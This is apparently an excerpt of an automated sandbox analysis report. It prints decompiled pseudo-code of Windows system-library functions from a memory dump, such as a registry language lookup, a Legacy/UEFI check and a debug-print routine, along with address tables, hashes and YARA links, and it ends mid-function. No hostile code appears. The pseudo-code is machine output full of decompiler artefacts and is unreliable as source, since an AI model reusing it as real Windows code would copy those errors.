                                                                                                            0x00b3548d
                                                                                                            0x00b35493
                                                                                                            0x00b354a9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b354ab
                                                                                                            0x00b354b4
                                                                                                            0x00b354bc
                                                                                                            0x00b354c8
                                                                                                            0x00b354de
                                                                                                            0x00b354fb
                                                                                                            0x00b354e0
                                                                                                            0x00b354e6
                                                                                                            0x00b354eb
                                                                                                            0x00b354eb
                                                                                                            0x00b354de
                                                                                                            0x00000000
                                                                                                            0x00b354bc
                                                                                                            0x00b35477
                                                                                                            0x00b3547a
                                                                                                            0x00b35480
                                                                                                            0x00b35483
                                                                                                            0x00b35486
                                                                                                            0x00b3548b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b3548b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b35447
                                                                                                            0x00b35447
                                                                                                            0x00b35447
                                                                                                            0x00b35447
                                                                                                            0x00b3544e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b35450
                                                                                                            0x00b35452
                                                                                                            0x00b35455
                                                                                                            0x00b3545a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b3545c
                                                                                                            0x00b3546a
                                                                                                            0x00b3546d
                                                                                                            0x00b3546f
                                                                                                            0x00000000
                                                                                                            0x00b3546f
                                                                                                            0x00ade70f

                                                                                                            Strings
                                                                                                            • @, xrefs: 00ADE6C0
                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00ADE68C
                                                                                                            • InstallLanguageFallback, xrefs: 00ADE6DB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                            • API String ID: 0-1757540487
                                                                                                            • Opcode ID: 4bb99fef8692381461f96f5c8a37819f7bfd48e3ef47bcb109ae007c553cdbda
                                                                                                            • Instruction ID: 5393888acfc889ac8aa85f31a6d424a7c7cea3d3ec586be2cac9f398b38d14cc
                                                                                                            • Opcode Fuzzy Hash: 4bb99fef8692381461f96f5c8a37819f7bfd48e3ef47bcb109ae007c553cdbda
                                                                                                            • Instruction Fuzzy Hash: 67516B765083459BC724EF64C440AABB3E8FF88714F5509AEB98A9B341F734DD4487A2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B551BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 77%
                                                                                                            			E00B551BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0xbb05f0);
				E00B2D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00AEEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E00B553CA(0);
						return E00B2D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E00B1F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E00AF3690(1, _t117, 0xab1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E00B1AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L00AF4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E00B1AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E00B5500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E00B19860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                                            0x00b551be
                                                                                                            0x00b551c3
                                                                                                            0x00b551c8
                                                                                                            0x00b551cd
                                                                                                            0x00b551d0
                                                                                                            0x00b551d3
                                                                                                            0x00b551d8
                                                                                                            0x00b551db
                                                                                                            0x00b551de
                                                                                                            0x00b551e0
                                                                                                            0x00b551e3
                                                                                                            0x00b551e6
                                                                                                            0x00b551e8
                                                                                                            0x00b55342
                                                                                                            0x00b55351
                                                                                                            0x00b55356
                                                                                                            0x00b5535a
                                                                                                            0x00b55360
                                                                                                            0x00b55363
                                                                                                            0x00b55366
                                                                                                            0x00b55369
                                                                                                            0x00b55369
                                                                                                            0x00b5536b
                                                                                                            0x00b5536b
                                                                                                            0x00b55370
                                                                                                            0x00b553a3
                                                                                                            0x00b553a4
                                                                                                            0x00b553a6
                                                                                                            0x00b553ab
                                                                                                            0x00b553ab
                                                                                                            0x00b553ae
                                                                                                            0x00b553ae
                                                                                                            0x00b553b5
                                                                                                            0x00b553bf
                                                                                                            0x00b553bf
                                                                                                            0x00b55375
                                                                                                            0x00b55396
                                                                                                            0x00b553a0
                                                                                                            0x00b553a0
                                                                                                            0x00000000
                                                                                                            0x00b55396
                                                                                                            0x00b55377
                                                                                                            0x00b55379
                                                                                                            0x00b5537f
                                                                                                            0x00b5538c
                                                                                                            0x00b55390
                                                                                                            0x00000000
                                                                                                            0x00b55390
                                                                                                            0x00b551ee
                                                                                                            0x00b551f1
                                                                                                            0x00b55301
                                                                                                            0x00b55310
                                                                                                            0x00b55315
                                                                                                            0x00b55318
                                                                                                            0x00b5531b
                                                                                                            0x00b55320
                                                                                                            0x00b5532e
                                                                                                            0x00b55331
                                                                                                            0x00000000
                                                                                                            0x00b55331
                                                                                                            0x00b55328
                                                                                                            0x00b55329
                                                                                                            0x00000000
                                                                                                            0x00b55329
                                                                                                            0x00b551fa
                                                                                                            0x00b55235
                                                                                                            0x00b55236
                                                                                                            0x00b55239
                                                                                                            0x00b5523f
                                                                                                            0x00b55240
                                                                                                            0x00b55241
                                                                                                            0x00b55242
                                                                                                            0x00b55246
                                                                                                            0x00b55247
                                                                                                            0x00b5524e
                                                                                                            0x00b55251
                                                                                                            0x00b55267
                                                                                                            0x00b55269
                                                                                                            0x00b5526e
                                                                                                            0x00b5527d
                                                                                                            0x00b5527e
                                                                                                            0x00b55281
                                                                                                            0x00b55282
                                                                                                            0x00b55287
                                                                                                            0x00b55288
                                                                                                            0x00b5528a
                                                                                                            0x00b5528f
                                                                                                            0x00b55294
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b5529a
                                                                                                            0x00b5529c
                                                                                                            0x00b5529e
                                                                                                            0x00b5529e
                                                                                                            0x00b552a4
                                                                                                            0x00b552b0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b552ba
                                                                                                            0x00b552bc
                                                                                                            0x00b552bc
                                                                                                            0x00b552d4
                                                                                                            0x00b552d9
                                                                                                            0x00b552dc
                                                                                                            0x00b552e1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b552e7
                                                                                                            0x00b552f4
                                                                                                            0x00000000
                                                                                                            0x00b552f4
                                                                                                            0x00b55270
                                                                                                            0x00000000
                                                                                                            0x00b55270
                                                                                                            0x00b551fc
                                                                                                            0x00b551fd
                                                                                                            0x00b55202
                                                                                                            0x00b55203
                                                                                                            0x00b55205
                                                                                                            0x00b5520a
                                                                                                            0x00b5520f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b5521b
                                                                                                            0x00b55226
                                                                                                            0x00b5522b
                                                                                                            0x00b5521d
                                                                                                            0x00b5521d
                                                                                                            0x00b55222
                                                                                                            0x00b55222
                                                                                                            0x00b5522d
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID: Legacy$UEFI
                                                                                                            • API String ID: 2994545307-634100481
                                                                                                            • Opcode ID: 04a0244692c92c48e614d127c4299eb4690918b03030ed28cf3c9296d43d322f
                                                                                                            • Instruction ID: 364ba93f07c360dd56af070c412af56d0cb17eaa92c7462ae0a2f0cef8ce1663
                                                                                                            • Opcode Fuzzy Hash: 04a0244692c92c48e614d127c4299eb4690918b03030ed28cf3c9296d43d322f
                                                                                                            • Instruction Fuzzy Hash: B0519171E00A189FDB24DFA8C8A0BADB7F8FF48742F1440ADE94AEB251D6719945CB14
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00ADB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E00ADB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0xbaf7a8);
				E00B2D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E00B2D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E00B1D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E00B1F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L00B2DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E00B1B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E00B1B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E00B1E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E00B1A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                                            0x00adb171
                                                                                                            0x00adb171
                                                                                                            0x00adb171
                                                                                                            0x00adb171
                                                                                                            0x00adb171
                                                                                                            0x00adb176
                                                                                                            0x00adb17b
                                                                                                            0x00adb180
                                                                                                            0x00adb186
                                                                                                            0x00adb18f
                                                                                                            0x00adb198
                                                                                                            0x00adb1a4
                                                                                                            0x00adb1aa
                                                                                                            0x00b34802
                                                                                                            0x00b34802
                                                                                                            0x00b34805
                                                                                                            0x00b3480c
                                                                                                            0x00b3480e
                                                                                                            0x00adb1d1
                                                                                                            0x00adb1d3
                                                                                                            0x00adb1de
                                                                                                            0x00adb1de
                                                                                                            0x00b34817
                                                                                                            0x00b3481e
                                                                                                            0x00b34820
                                                                                                            0x00b34822
                                                                                                            0x00b34822
                                                                                                            0x00b34824
                                                                                                            0x00b34824
                                                                                                            0x00b3482a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b34835
                                                                                                            0x00b3483a
                                                                                                            0x00b3483d
                                                                                                            0x00b3483f
                                                                                                            0x00b34842
                                                                                                            0x00b34842
                                                                                                            0x00b34842
                                                                                                            0x00b34846
                                                                                                            0x00b3484c
                                                                                                            0x00b3484e
                                                                                                            0x00b34851
                                                                                                            0x00b34851
                                                                                                            0x00b34853
                                                                                                            0x00b34854
                                                                                                            0x00b34854
                                                                                                            0x00b34858
                                                                                                            0x00b3485a
                                                                                                            0x00b3485a
                                                                                                            0x00b3485d
                                                                                                            0x00b3485f
                                                                                                            0x00b34861
                                                                                                            0x00b34861
                                                                                                            0x00b34866
                                                                                                            0x00b3486b
                                                                                                            0x00b3486e
                                                                                                            0x00b34871
                                                                                                            0x00b34876
                                                                                                            0x00b34876
                                                                                                            0x00b34878
                                                                                                            0x00b3487b
                                                                                                            0x00b34884
                                                                                                            0x00b34884
                                                                                                            0x00000000
                                                                                                            0x00b3487d
                                                                                                            0x00b3487d
                                                                                                            0x00b34882
                                                                                                            0x00b34889
                                                                                                            0x00b34889
                                                                                                            0x00b3488f
                                                                                                            0x00b34891
                                                                                                            0x00b348e0
                                                                                                            0x00b348e2
                                                                                                            0x00b348e4
                                                                                                            0x00b348e4
                                                                                                            0x00b348e7
                                                                                                            0x00b348e7
                                                                                                            0x00b348ed
                                                                                                            0x00b348f4
                                                                                                            0x00b348f6
                                                                                                            0x00b34951
                                                                                                            0x00b34951
                                                                                                            0x00b34953
                                                                                                            0x00b34953
                                                                                                            0x00b34956
                                                                                                            0x00b34956
                                                                                                            0x00b34958
                                                                                                            0x00b34959
                                                                                                            0x00b34959
                                                                                                            0x00b3495d
                                                                                                            0x00b3495d
                                                                                                            0x00b3495f
                                                                                                            0x00b3495f
                                                                                                            0x00b34965
                                                                                                            0x00b34969
                                                                                                            0x00b349ba
                                                                                                            0x00b349ba
                                                                                                            0x00b349c1
                                                                                                            0x00b349c5
                                                                                                            0x00b349cc
                                                                                                            0x00b349d4
                                                                                                            0x00b349d7
                                                                                                            0x00b349da
                                                                                                            0x00b349e4
                                                                                                            0x00b349e5
                                                                                                            0x00b349f3
                                                                                                            0x00b34a02
                                                                                                            0x00000000
                                                                                                            0x00b34a02
                                                                                                            0x00b34972
                                                                                                            0x00b34974
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b34976
                                                                                                            0x00b34979
                                                                                                            0x00b34982
                                                                                                            0x00b34983
                                                                                                            0x00b34984
                                                                                                            0x00b3498b
                                                                                                            0x00b3498d
                                                                                                            0x00b34991
                                                                                                            0x00b34993
                                                                                                            0x00b34999
                                                                                                            0x00b3499d
                                                                                                            0x00b349a2
                                                                                                            0x00b349a2
                                                                                                            0x00b349a2
                                                                                                            0x00b34999
                                                                                                            0x00b349ac
                                                                                                            0x00000000
                                                                                                            0x00b349b3
                                                                                                            0x00b348f8
                                                                                                            0x00b348fe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b348fe
                                                                                                            0x00b34895
                                                                                                            0x00b3489c
                                                                                                            0x00b348ad
                                                                                                            0x00b348b2
                                                                                                            0x00b348b5
                                                                                                            0x00b348b7
                                                                                                            0x00b348ba
                                                                                                            0x00b348bc
                                                                                                            0x00b348c6
                                                                                                            0x00b348c6
                                                                                                            0x00b348cb
                                                                                                            0x00b348d1
                                                                                                            0x00b348d4
                                                                                                            0x00b348d8
                                                                                                            0x00b348d8
                                                                                                            0x00000000
                                                                                                            0x00b348d8
                                                                                                            0x00b348be
                                                                                                            0x00b348c0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b348c2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b348c4
                                                                                                            0x00000000
                                                                                                            0x00b34882
                                                                                                            0x00b3487b
                                                                                                            0x00b34904
                                                                                                            0x00b34906
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b34908
                                                                                                            0x00b3490e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b34910
                                                                                                            0x00b34917
                                                                                                            0x00b34917
                                                                                                            0x00000000
                                                                                                            0x00b34917
                                                                                                            0x00adb1ba
                                                                                                            0x00b347f9
                                                                                                            0x00b347fc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b347fc
                                                                                                            0x00adb1c0
                                                                                                            0x00adb1c0
                                                                                                            0x00adb1c3
                                                                                                            0x00adb1cb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: _vswprintf_s
                                                                                                            • String ID:
                                                                                                            • API String ID: 677850445-0
                                                                                                            • Opcode ID: 0c557b692bd59588861b250350f1368a25078f2df940fe7296a35870719380b2
                                                                                                            • Instruction ID: 17153abb77bc9f14f0a62dd8e73135ced10ba31a02de393e04744c98847a9907
                                                                                                            • Opcode Fuzzy Hash: 0c557b692bd59588861b250350f1368a25078f2df940fe7296a35870719380b2
                                                                                                            • Instruction Fuzzy Hash: 8451CD71D102698EDF31CF688845BAEBBF0EF04710F2142E9E859AB282D7746D858B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00AFB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 76%
                                                                                                            			E00AFB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0xbcd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E00AF7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E00BA8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E00B19E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E00B1B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E00B1CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E00AF7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E00BA8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E00B1AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0xbc8628; // 0x0
								_v68 = _t77;
								_t78 =  *0xbc862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
